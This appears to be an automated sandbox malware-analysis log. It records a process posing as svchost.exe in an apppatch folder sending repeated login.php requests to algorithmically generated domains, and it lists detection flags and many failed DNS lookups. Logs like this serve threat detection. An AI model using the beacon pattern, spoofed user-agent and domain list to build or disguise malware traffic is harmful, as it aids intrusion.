Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731345856.5179536
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731345856.5241611
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345856.5179536
Source: HTTP traffic: GET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=904vr478891445443024397
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; snkz=66.23.206.109
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com If-Modified-Since: Wed, 22 Feb 2023 21:25:52 GMT If-None-Match: "63f68860-251"
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731345856.5241611
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731345856.5179536
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345856.5179536
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345856.5241611
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrylix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
